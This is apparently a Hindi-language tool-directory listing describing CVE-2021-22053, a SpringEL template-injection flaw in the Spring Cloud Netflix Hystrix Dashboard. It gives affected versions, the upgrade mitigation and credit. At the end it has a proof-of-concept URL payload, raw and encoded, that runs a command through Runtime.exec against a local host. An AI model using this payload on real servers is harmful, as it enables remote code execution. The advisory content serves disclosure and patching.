Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
spring-cloud-netflix-hystrix-dashboard-cve-2021-22053 — Spring Cloud Netflix Hystrix Dashboard टेम्पलेट रिज़ॉल्यूशन भेद्यता CVE-2021-22053 | Kitploit
उपकरण/GitHubGitHub/seccoder-security-lab/spring-cloud-netflix-hystrix-dashboard-cve-2021-22053
भेद्यता विश्लेषणकोड विश्लेषणशोषणवेब एप्लिकेशन शोषणलर्निंग और शिक्षा
GitHubseccoder-security-lab/spring-cloud-netflix-hystrix-dashboard-cve-2021-22053

spring-cloud-netflix-hystrix-dashboard-cve-2021-22053

Spring Cloud Netflix Hystrix Dashboard टेम्पलेट रिज़ॉल्यूशन भेद्यता CVE-2021-22053

रिपॉजिटरी देखें

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
3783 साल पहलेKitploit द्वारा समीक्षित

CVE-2021-22053: Spring Cloud Netflix Hystrix Dashboard टेम्पलेट रिज़ॉल्यूशन भेद्यता

गंभीरता

उच्च

विक्रेता

VMware द्वारा Spring

विवरण

दोनों spring-cloud-netflix-hystrix-dashboard और spring-boot-starter-thymeleaf का उपयोग करने वाले अनुप्रयोग, व्यू टेम्पलेट्स के रिज़ॉल्यूशन के दौरान अनुरोध URI पथ में प्रस्तुत कोड को निष्पादित करने का एक तरीका उजागर करते हैं। जब /hystrix/monitor;[user-provided data] पर अनुरोध किया जाता है, तो hystrix/monitor के बाद के पथ तत्वों का मूल्यांकन SpringEL अभिव्यक्तियों के रूप में किया जाता है, जिससे कोड निष्पादन हो सकता है।

प्रभावित VMware उत्पाद और संस्करण

जब तक अन्यथा न कहा जाए, गंभीरता उच्च है।

  • Spring Cloud Netflix
    • 2.2.0.RELEASE से 2.2.9.RELEASE
    • पुराने, असमर्थित संस्करण भी प्रभावित हैं

शमन

प्रभावित संस्करणों के उपयोगकर्ताओं को निम्नलिखित शमन लागू करना चाहिए: उपयोगकर्ताओं को 2.2.10.RELEASE+ पर अपग्रेड करना चाहिए। कोई अन्य कदम आवश्यक नहीं हैं। इस समस्या को ठीक करने वाले रिलीज़ में शामिल हैं:

  • Spring Cloud Netflix
    • 2.2.10.RELEASE+

श्रेय

यह भेद्यता SecCoder Security Lab के threedr3am द्वारा पहचानी गई और जिम्मेदारीपूर्वक रिपोर्ट की गई ([email protected])।

संदर्भ

https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:L

इतिहास

2021-11-17: प्रारंभिक भेद्यता रिपोर्ट प्रकाशित हुई।

POC

कच्चा:

root@kitploit:~
http://127.0.0.1:8080/hystrix/;a=a/__${T (java.lang.Runtime).getRuntime().exec("open -a calculator")}__::.x/

एन्कोडेड:

root@kitploit:~
http://127.0.0.1:8080/hystrix/;a=a/__$%7BT%20(java.lang.Runtime).getRuntime().exec(%22open%20-a%20calculator%22)%7D__::.x/

PS. कमांड में विकर्ण बार '/' नहीं दिया जा सकता।

टूल डाउनलोड करें